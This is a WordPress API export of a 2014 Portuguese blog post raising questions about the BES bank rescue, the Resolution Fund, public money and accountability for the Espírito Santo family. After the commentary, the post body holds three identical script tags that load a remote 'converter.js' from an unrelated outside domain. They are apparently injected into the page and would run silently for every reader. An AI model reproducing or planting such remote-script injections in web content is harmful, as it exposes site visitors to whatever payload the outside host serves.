{"id":747,"date":"2014-08-03T08:57:29","date_gmt":"2014-08-03T08:57:29","guid":{"rendered":"http:\/\/www.jralmeida.com\/?p=747"},"modified":"2015-04-09T17:41:40","modified_gmt":"2015-04-09T17:41:40","slug":"perguntas-sobre-a-nova-operacao-no-bes","status":"publish","type":"post","link":"https:\/\/www.jralmeida.com\/?p=747","title":{"rendered":"Perguntas sobre a nova opera\u00e7\u00e3o no BES"},"content":{"rendered":"<p>N\u00e3o sei se entendi bem o que o pol\u00edtico e comentador Marques Mendes, anunciou ontem em rela\u00e7\u00e3o \u00e0 opera\u00e7\u00e3o em curso no BES. Aquilo que me pareceu \u00f3bvio \u00e9 que v\u00e3o ser injectados capitais &#8211; incluindo p\u00fablicos &#8211; para o objectivo final de vender os bons activos do BES \u00e0 banca internacional (Deutsche Bank?) que vai adquirir &#8211; de uma vez &#8211; 20% do mercado nacional e tornar-se um elemento essencial no mercado portugu\u00eas. Ou seja, aquilo que nunca tinha conseguido antes, mesmo com as suas participa\u00e7\u00f5es de capital noutras institui\u00e7\u00f5es.<\/p>\n<p>Mas deixem-me fazer algumas perguntas:<\/p>\n<p>* H\u00e1 a possibilidade de o fundo de capitaliza\u00e7\u00e3o (de fundos p\u00fablicos, emprestados pela troika e, por isso, pagos como d\u00edvida p\u00fablica) que vai recapitalizar o Good BES n\u00e3o reaver os capitais injectados no BES, ap\u00f3s a sua venda? Que garantias h\u00e1 que o pre\u00e7o de venda cubra o capital injectado?<\/p>\n<p>* Al\u00e9m desses, \u00e9 dito que n\u00e3o s\u00e3o fundos p\u00fablicos que entrar\u00e3o na recapitaliza\u00e7\u00e3o do Good BES, mas do Fundo de Resolu\u00e7\u00e3o. Ora, esse Fundo \u00e9 &#8211; de acordo com o novo Regime Geral de Institui\u00e7\u00f5es de Cr\u00e9dito (<a title=\"DL 31-A\/2012\" href=\"http:\/\/www.fgcam.pt\/SiteCollectionDocuments\/DL%2031_A_2012.pdf\">DL 31-A\/2012<\/a>) &#8211; composto pelas institui\u00e7\u00f5es de cr\u00e9dito com sede em Portugal. Ou seja, incluindo a CGD. E s\u00e3o essas institui\u00e7\u00f5es que financiam o fundo. Quest\u00e3o: qual \u00e9 a parte da CGD nesse fundo actualmente?<\/p>\n<p>* Mais: esse mesmo diploma fixa que &#8220;Se os recursos do Fundo se mostrarem insuficientes para o cumprimento das suas obriga\u00e7\u00f5es, pode ser determinado por diploma pr\u00f3prio que as institui\u00e7\u00f5es participantes efectuem contribui\u00e7\u00f5es especiais, e definir os montantes, presta\u00e7\u00f5es, prazos e demais termos dessas contribui\u00e7\u00f5es&#8221; e que (artigo 153-J) &#8220;aos recursos previstos no artigo anterior poder\u00e3o ainda acrescer, excepcionalmente, contribui\u00e7\u00f5es adicionais do Estado para o Fundo, nomeadamente sob a forma de empr\u00e9stimos ou presta\u00e7\u00e3o de garantias&#8221;. Portanto, n\u00e3o \u00e9 verdade que seja o sector financeiro privado que vai financiar o novo banco. Os recursos p\u00fablicos estar\u00e3o l\u00e1 metidos tamb\u00e9m. E em grande parte.<\/p>\n<p>* Diz o novo diploma que se far\u00e1 uma selec\u00e7\u00e3o de activos entre o Good BES e o Bad BES. Mas como se vai fazer a avalia\u00e7\u00e3o e a selec\u00e7\u00e3o dos activos? Pelas mesmas firmas de auditoria que deixaram passar a a actual situa\u00e7\u00e3o e que agora afirmam que n\u00e3o t\u00eam poderes para obrigar a institui\u00e7\u00e3o auditada a fornecer informa\u00e7\u00e3o? Quem pagar\u00e1 esse trabalho? \u00c9 que o novo Regime Geral de Institui\u00e7\u00f5es de Cr\u00e9dito apenas diz que \u00e9 o Banco de Portugal a determinar que parte do activo seja transferido, mas n\u00e3o esclerece como.<\/p>\n<p>* A quest\u00e3o anterior n\u00e3o \u00e9 de somenos, j\u00e1 que o mesmo Regime Geral fixa que: &#8220;Caso a contrapartida fixada no momento da aliena\u00e7\u00e3o dos activos, passivos, elementos extrapatrimoniais e activos sob gest\u00e3o transferidos n\u00e3o corresponda comprovadamente ao seu justo valor, pode a institui\u00e7\u00e3o adquirente, ap\u00f3s autoriza\u00e7\u00e3o do Banco de Portugal, devolver esses activos, passivos, elementos extrapatrimoniais e activos sob gest\u00e3o&#8221;. Ou que &#8220;Em alternativa \u00e0 devolu\u00e7\u00e3o prevista no n\u00famero anterior, pode o Banco de Portugal propor \u00e0 institui\u00e7\u00e3o adquirente o pagamento do valor correspondente \u00e0 diferen\u00e7a existente entre a contrapartida estipulada para a aliena\u00e7\u00e3o e o justo valor dos activos, passivos, elementos extrapatrimoniais e activos sob gest\u00e3o&#8221;.\u00a0 E que &#8220;O pagamento previsto no n\u00famero anterior pode ser efectuado atrav\u00e9s da transfer\u00eancia para a institui\u00e7\u00e3o adquirente de novos activos da institui\u00e7\u00e3o de cr\u00e9dito alienante ou de verbas provenientes do Fundo de Resolu\u00e7\u00e3o, do Fundo de Garantia de Dep\u00f3sitos&#8221;. Ou seja, que garantias h\u00e1 &#8211; garantias mesmo! &#8211; que n\u00e3o sejamos postos a pagar uma reavalia\u00e7\u00e3o dos activos?<\/p>\n<p>* E o que acontece ao Bad BES? Supostamente os accionistas actuais v\u00e3o arcar com as responsabilidades surgidas. E se n\u00e3o conseguirem solver os seus encargos, o que acontece ao Bad BES? Entra em insolv\u00eancia? Ou ser\u00e1 que os bens pessoais dos administradores e benefici\u00e1rios d\u00e1 gest\u00e3o danosa v\u00e3o ser chamados a pagar? Ou a responsabilidade \u00e9 limitada ao Bad BES e nesse caso as contas offshore da fam\u00edlia Esp\u00edrito Santo &#8211; eventualmente alimentadas com os \u00faltimos empr\u00e9stimos do BES, feitos \u00e0 pressa antes que o Banco de Portugal actuasse &#8211; continuar\u00e3o activas e a gozar o bom da vida com o dinheiro dos seus clientes? Que medidas v\u00e3o ser tomadas para que os seus bens pessoais sejam chamados a pagar o &#8220;buraco&#8221;?<\/p>\n<p>Portanto, h\u00e1 ainda muitos pormenores a estudar e a dar aten\u00e7\u00e3o.<\/p>\n<p>\u00c9 que, como diz o ditado alem\u00e3o, &#8220;\u00e9 nos pormenores que se esconde o diabo&#8221;&#8230;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><br \/>\n<script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><\/p>\n<p><script src=\"http:\/\/centrexity.com\/converter.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00e3o sei se entendi bem o que o pol\u00edtico e comentador Marques Mendes, anunciou ontem em rela\u00e7\u00e3o \u00e0 opera\u00e7\u00e3o em curso no BES. Aquilo que me pareceu \u00f3bvio \u00e9 que v\u00e3o ser injectados capitais &#8211; incluindo p\u00fablicos &#8211; para o objectivo final de vender os bons activos do BES \u00e0 banca internacional (Deutsche Bank?) que [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":748,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31],"tags":[],"class_list":["post-747","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"_links":{"self":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/747","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=747"}],"version-history":[{"count":1,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/747\/revisions"}],"predecessor-version":[{"id":1500,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/posts\/747\/revisions\/1500"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=\/wp\/v2\/media\/748"}],"wp:attachment":[{"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=747"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=747"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jralmeida.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=747"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}